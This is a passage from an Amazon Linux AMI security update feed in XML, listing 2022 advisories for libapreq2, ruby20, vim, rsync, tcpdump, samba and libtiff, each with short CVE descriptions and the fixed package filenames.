version="4.14.294" release="150.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.294-150.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1637</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1637: important priority package update for libapreq2</title><issued date="2022-09-30 02:41:00" /><updated date="2022-10-10 20:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22728:
A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22728" title="" id="CVE-2022-22728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libapreq2-libs" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-libs-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-libapreq2-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-debuginfo-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-devel-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-2.13-38.3.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-libs" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-libs-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-devel-2.13-38.3.amzn1.i686.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-libapreq2-2.13-38.3.amzn1.i686.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.3.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-debuginfo-2.13-38.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1638</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1638: medium priority package update for ruby20</title><issued date="2022-10-03 19:29:00" /><updated date="2022-10-10 20:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28739:
A buffer overrun vulnerability was found in Ruby. The issue occurs in a conversion algorithm from a String to a Float that causes process termination due to a segmentation fault, but under limited circumstances. This flaw may cause an illegal memory read.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28739" title="" id="CVE-2022-28739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-libs" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.41.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.41.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.41.amzn1.noarch.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.41.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.41.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.41.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.41.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.41.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1639</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1639: low priority package update for vim</title><issued date="2022-10-17 20:22:00" /><updated date="2022-10-20 20:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3037:
Use After Free in GitHub repository vim/vim prior to 9.0.0322.
CVE-2022-2819:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a heap buffer overflow vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-2817:
A use-after-free vulnerability was found in Vim in the string_quote function in the strings.c file. This issue occurs because an already freed memory is used when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the use-after-free, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2816:
An out-of-bounds read vulnerability was found in Vim in the check_vim9_unlet function in the vim9cmds.c file. This issue occurs because of invalid memory access when compiling the unlet command when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the out-of-bounds read, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2345:
A use-after-free vulnerability was found in Vim in the skipwhite function in the charset.c file. This issue occurs because an already freed memory is used when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the use-after-free, and cause the application to crash, possibly executing code and corrupting memory.
CVE-2022-2344:
A heap-based buffer overflow was found in Vim in the ins_compl_add function in the insexpand.c file. This issue occurs due to a read past the end of a buffer when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the heap-based buffer overflow, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2343:
A heap-based buffer overflow was found in Vim in the ins_compl_add function in the insexpand.c file. This issue occurs due to a read past the end of a buffer when a specially crafted input is processed. This flaw allows an attacker who can trick a user into opening a specially crafted file into triggering the heap-based buffer overflow, causing the application to crash, possibly executing code and corrupting memory.
CVE-2022-2304:
A stack-based buffer overflow vulnerability was found in Vim's spell_dump_compl() function of the src/spell.c file. This issue occurs because the spell dump goes beyond the end of an array when crafted input is processed. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds write that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2289:
Use After Free in GitHub repository vim/vim prior to 9.0.
CVE-2022-2288:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.
CVE-2022-2287:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.
CVE-2022-2286:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.
CVE-2022-2285:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.
CVE-2022-2284:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.
CVE-2022-2264:
A heap buffer overflow vulnerability was found in Vim's inc() function of misc2.c. This issue occurs because Vim reads beyond the end of the line with a put command. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds read that causes a crash in the CLI tool.
CVE-2022-2257:
A flaw was found in vim, which is vulnerable to an out-of-bounds read in the msg_outtrans_special function. This flaw allows a specially crafted file to crash software or execute code when opened in vim.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2257" title="" id="CVE-2022-2257" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2264" title="" id="CVE-2022-2264" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2284" title="" id="CVE-2022-2284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2285" title="" id="CVE-2022-2285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2286" title="" id="CVE-2022-2286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2287" title="" id="CVE-2022-2287" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2288" title="" id="CVE-2022-2288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2289" title="" id="CVE-2022-2289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2304" title="" id="CVE-2022-2304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2343" title="" id="CVE-2022-2343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2344" title="" id="CVE-2022-2344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2345" title="" id="CVE-2022-2345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2816" title="" id="CVE-2022-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2817" title="" id="CVE-2022-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2819" title="" id="CVE-2022-2819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3037" title="" id="CVE-2022-3037" type="cve" /></references><pkglist><collection 
short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.475" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.475-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.475" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.475-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.475" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.475-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.475-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.475" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.475-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1640</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1640: important priority package 
update for rsync</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25032:
An out-of-bounds access flaw was found in zlib, which allows memory corruption when deflating (ex: when compressing) if the input has many distant matches. For some rare inputs with a large number of distant matches (crafted payloads), the buffer into which the compressed or deflated data is written can overwrite the distance symbol table which it overlays. This issue results in corrupted output due to invalid distances, which leads to out-of-bound access, corrupting the memory and potentially crashing the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032" title="" id="CVE-2018-25032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsync-debuginfo" version="3.0.6" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-debuginfo-3.0.6-12.14.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-3.0.6-12.14.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-3.0.6-12.14.amzn1.i686.rpm</filename></package><package name="rsync-debuginfo" version="3.0.6" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-debuginfo-3.0.6-12.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1641</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1641: medium priority package update for tcpdump</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15167:
The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 3, a different vulnerability than CVE-2018-14463.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15167" title="" id="CVE-2019-15167" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tcpdump-debuginfo" version="4.9.2" release="4.24.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-debuginfo-4.9.2-4.24.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.9.2" release="4.24.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-4.9.2-4.24.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.9.2" release="4.24.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-4.9.2-4.24.amzn1.i686.rpm</filename></package><package name="tcpdump-debuginfo" version="4.9.2" release="4.24.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-debuginfo-4.9.2-4.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1642</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1642: important priority package update for samba</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-32746:
A flaw was found in the Samba AD LDAP server. The AD DC database audit logging module can access LDAP message values freed by a preceding database module, resulting in a use-after-free issue. This issue is only possible when modifying certain privileged attributes, such as userAccountControl.
CVE-2022-32745:
A flaw was found in Samba. Samba AD users can cause the server to access uninitialized data with an LDAP add or modify request, usually resulting in a segmentation fault.
CVE-2022-32744:
A flaw was found in Samba. The KDC accepts kpasswd requests encrypted with any key known to it. By encrypting forged kpasswd requests with its own key, a user can change other users' passwords, enabling full domain takeover.
CVE-2022-32742:
A flaw was found in Samba. Some SMB1 write requests were not correctly range-checked to ensure the client had sent enough data to fulfill the write, allowing server memory contents to be written into the file (or printer) instead of client-supplied data. The client cannot control the area of the server memory written to the file (or printer).
CVE-2020-17049:
It was found that the Kerberos Key Distribution Center (KDC) delegation feature, Service for User (S4U), did not sufficiently protect the tickets it provides from tampering. A malicious, authenticated service principal allowed to delegate could use this flaw to impersonate a non-forwardable user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17049" title="" id="CVE-2020-17049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32742" title="" id="CVE-2022-32742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32744" title="" id="CVE-2022-32744" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32745" title="" id="CVE-2022-32745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32746" title="" id="CVE-2022-32746" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsmbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="20.62.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-20.62.amzn1.noarch.rpm</filename></package><package name="ctdb" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" 
release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="20.62.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-20.62.amzn1.noarch.rpm</filename></package><package name="samba-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-test" 
version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" 
release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" 
release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-20.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1644</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1644: important priority package update for libtiff</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3970:
A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt in the file libtiff/tif_getimage.c. The manipulation leads to an integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.
CVE-2022-1355:
A stack buffer overflow flaw was found in the main() function of LibTIFF's tiffcp.c. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow, possibly corrupting memory, and causing a crash that leads to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1355" title="" id="CVE-2022-1355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3970" title="" id="CVE-2022-3970" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 